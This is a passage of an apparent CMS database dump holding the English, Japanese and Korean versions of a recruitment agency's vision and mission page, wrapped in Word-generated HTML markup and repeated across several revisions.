Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong><u>미션</u></strong></span><o:p></o:p></p></blockquote><p class=\"MsoListParagraph\">&nbsp;</p><p class=\"MsoNormal\"><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>대행사와</strong></span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>&nbsp;</strong></span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>고객</strong></span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>&nbsp;</strong></span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>간의</strong></span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>&nbsp;</strong></span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>상호</strong></span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\"><strong>,&nbsp;</strong></span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>존중</strong></span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\"><strong>,&nbsp;</strong></span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>정직</strong></span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\"><strong>,&nbsp;</strong></span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>신뢰로</strong></span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>&nbsp;</strong></span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>오래</strong></span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>&nbsp;</strong></span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>지속되는</strong></span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>&nbsp;</strong></span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>관계를</strong></span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>&nbsp;</strong></span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>구축하기</strong></span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>&nbsp;</strong></span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\"><strong>.</strong></span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>다른 대행사에 비하면 고객들이</strong></span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>&nbsp;</strong></span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>선호하는</strong></span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>&nbsp;</strong></span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>리딩</strong></span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>&nbsp;</strong></span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>에이전시 되기</strong></span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>&nbsp;</strong></span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>위해</strong></span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\"><strong>.</strong></span><o:p></o:p><o:p></o:p><o:p></o:p><o:p></o:p></p>', '', 'full_html'),
('page', 0, 25, 240, 'en', 0, '<img src=\"/sites/default/files/inline-images/0-02-06-98e79837b22db49ed6250ce32438641ad5317faca801557576a6d2e0bcfbf32b_c40bace8a4dbb014_1.jpg\" data-align=\"left\" data-entity-uuid=\"41966a19-134b-450b-9bc4-17e138bb169b\" data-entity-type=\"file\" width=\"29.92%\"><blockquote><h3><strong>Our Vision&nbsp;</strong></h3></blockquote><p class=\"MsoNormal\" style=\"tab-stops:194.95pt;\"><span style=\"font-size:12.0pt;line-height:107%;\">The aim is to train the best local human resources and develop overseas employment opportunities as an International quality company.</span><o:p></o:p></p><p>&nbsp;</p><blockquote><h3><strong>Our Mission&nbsp;</strong></h3></blockquote><p>To create lasting relationships with our clients and candidates based on honesty, integrity, trust and mutual respect. To be the leading partner that clients and candidates always choose to connect with.</p>', '', 'full_html'),
('page', 0, 25, 240, 'ja', 0, '<img src=\"/sites/default/files/inline-images/0-02-06-98e79837b22db49ed6250ce32438641ad5317faca801557576a6d2e0bcfbf32b_c40bace8a4dbb014_2.jpg\" data-align=\"left\" data-entity-uuid=\"660bf351-a3d0-4bc7-9799-6b728a87a97e\" data-entity-type=\"file\" width=\"29.26%\"><blockquote><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:14.0pt;line-height:107%;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;\"><strong><u>目標</u></strong></span></p></blockquote><p class=\"MsoNormal\">能力の高い生徒達を生み出し、国際スタンダードに負けない会社を運営して参ります。</p><p class=\"MsoNormal\">&nbsp;</p><p class=\"MsoNormal\"><o:p></o:p></p><blockquote><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:14.0pt;line-height:107%;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;\"><strong><u>ミッション</u></strong></span><o:p></o:p></p></blockquote><p>正直さ、誠実さ、信頼、相互尊重を基本に、クライアントや候補者と永続的な関係を築くこと。<br>クライアントと候補者から常に選ばれるリーディング・パートナーとなること。<o:p></o:p></p>', '', 'full_html'),
('page', 0, 25, 240, 'ko', 0, '<img src=\"/sites/default/files/inline-images/0-02-06-98e79837b22db49ed6250ce32438641ad5317faca801557576a6d2e0bcfbf32b_c40bace8a4dbb014_3.jpg\" data-align=\"left\" data-entity-uuid=\"3977704f-ae01-480d-96a0-4d4a5102b194\" data-entity-type=\"file\" alt=\"\" width=\"29.98%\"><blockquote><p class=\"MsoNormal\" style=\"tab-stops:350.7pt;\"><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong><u>우리의</u></strong></span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong><u>&nbsp;</u></strong></span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong><u>비젼</u></strong></span><o:p></o:p></p></blockquote><p class=\"MsoNormal\"><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">목표는 최고의</span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">&nbsp;</span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">인재를</span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">&nbsp;</span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">양성하고</span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">&nbsp;</span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">국제 푶준 회사로서</span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">&nbsp;</span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">해외</span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">&nbsp;</span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">취업</span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">&nbsp;</span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">기회를</span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">&nbsp;</span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">발굴하는</span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">&nbsp;</span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">것입니다</span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\">.</span><o:p></o:p></p><p class=\"MsoNormal\">&nbsp;</p><p class=\"MsoNormal\">&nbsp;</p><blockquote><p class=\"MsoNormal\"><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong><u>우리의</u></strong></span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong><u>&nbsp;</u></strong></span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong><u>미션</u></strong></span><o:p></o:p></p></blockquote><p class=\"MsoNormal\"><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>대행사와</strong></span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>&nbsp;</strong></span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>고객</strong></span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>&nbsp;</strong></span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>간의</strong></span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>&nbsp;</strong></span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>상호</strong></span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\"><strong>,&nbsp;</strong></span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>존중</strong></span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\"><strong>,&nbsp;</strong></span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>정직</strong></span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\"><strong>,&nbsp;</strong></span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>신뢰로</strong></span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>&nbsp;</strong></span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>오래</strong></span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>&nbsp;</strong></span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>지속되는</strong></span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>&nbsp;</strong></span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>관계를</strong></span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>&nbsp;</strong></span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>구축하기</strong></span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>&nbsp;</strong></span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\"><strong>.</strong></span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>다른 대행사에 비하면 고객들이</strong></span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>&nbsp;</strong></span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>선호하는</strong></span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>&nbsp;</strong></span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>리딩</strong></span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>&nbsp;</strong></span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>에이전시 되기</strong></span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>&nbsp;</strong></span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>위해</strong></span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\"><strong>.</strong></span><o:p></o:p><o:p></o:p><o:p></o:p><o:p></o:p></p>', '', 'full_html'),
('page', 0, 25, 250, 'en', 0, '<img src=\"/sites/default/files/inline-images/0-02-06-98e79837b22db49ed6250ce32438641ad5317faca801557576a6d2e0bcfbf32b_c40bace8a4dbb014_1.jpg\" data-align=\"left\" data-entity-uuid=\"41966a19-134b-450b-9bc4-17e138bb169b\" data-entity-type=\"file\" width=\"29.92%\"><blockquote><h3><strong>Our Vision&nbsp;</strong></h3></blockquote><p class=\"MsoNormal\" style=\"tab-stops:194.95pt;\"><span style=\"font-size:12.0pt;line-height:107%;\">The aim is to train the best local human resources and develop overseas employment opportunities as an International quality company.</span><o:p></o:p></p><p>&nbsp;</p><blockquote><h3><strong>Our Mission&nbsp;</strong></h3></blockquote><p>To create lasting relationships with our clients and candidates based on honesty, integrity, trust and mutual respect. To be the leading partner that clients and candidates always choose to connect with.</p>', '', 'full_html'),
('page', 0, 25, 250, 'ja', 0, '<img src=\"/sites/default/files/inline-images/0-02-06-98e79837b22db49ed6250ce32438641ad5317faca801557576a6d2e0bcfbf32b_c40bace8a4dbb014_2.jpg\" data-align=\"left\" data-entity-uuid=\"660bf351-a3d0-4bc7-9799-6b728a87a97e\" data-entity-type=\"file\" width=\"29.26%\"><blockquote><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:14.0pt;line-height:107%;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;\"><strong><u>目標</u></strong></span></p></blockquote><p class=\"MsoNormal\">能力の高い生徒達を生み出し、国際スタンダードに負けない会社を運営して参ります。</p><p class=\"MsoNormal\">&nbsp;</p><p class=\"MsoNormal\"><o:p></o:p></p><blockquote><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:14.0pt;line-height:107%;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;\"><strong><u>ミッション</u></strong></span><o:p></o:p></p></blockquote><p>正直さ、誠実さ、信頼、相互尊重を基本に、クライアントや候補者と永続的な関係を築くこと。<br>クライアントと候補者から常に選ばれるリーディング・パートナーとなること。<o:p></o:p></p>', '', 'full_html'),
('page', 0, 25, 250, 'ko', 0, '<img src=\"/sites/default/files/inline-images/0-02-06-98e79837b22db49ed6250ce32438641ad5317faca801557576a6d2e0bcfbf32b_c40bace8a4dbb014_3.jpg\" data-align=\"left\" data-entity-uuid=\"3977704f-ae01-480d-96a0-4d4a5102b194\" data-entity-type=\"file\" alt=\"\" width=\"29.98%\"><blockquote><p class=\"MsoNormal\" style=\"tab-stops:350.7pt;\"><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong><u>우리의</u></strong></span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong><u>&nbsp;</u></strong></span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong><u>비젼</u></strong></span><o:p></o:p></p></blockquote><p class=\"MsoNormal\"><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">목표는 최고의</span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">&nbsp;</span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">인재를</span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">&nbsp;</span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">양성하고</span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">&nbsp;</span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">국제 푶준 회사로서</span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">&nbsp;</span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">해외</span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">&nbsp;</span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">취업</span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">&nbsp;</span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">기회를</span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">&nbsp;</span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">발굴하는</span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">&nbsp;</span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">것입니다</span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\">.</span><o:p></o:p></p><p class=\"MsoNormal\">&nbsp;</p><p class=\"MsoNormal\">&nbsp;</p><blockquote><p class=\"MsoNormal\"><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong><u>우리의</u></strong></span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong><u>&nbsp;</u></strong></span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong><u>미션</u></strong></span><o:p></o:p></p></blockquote><p><strong>대행사와 고객 간의 상호, 존중, 정직, 신뢰로 오래 지속되는 관계를 구축하기 .</strong><br><strong>다른 대행사에 비하면 고객들이 선호하는 선두 에이전시 되기 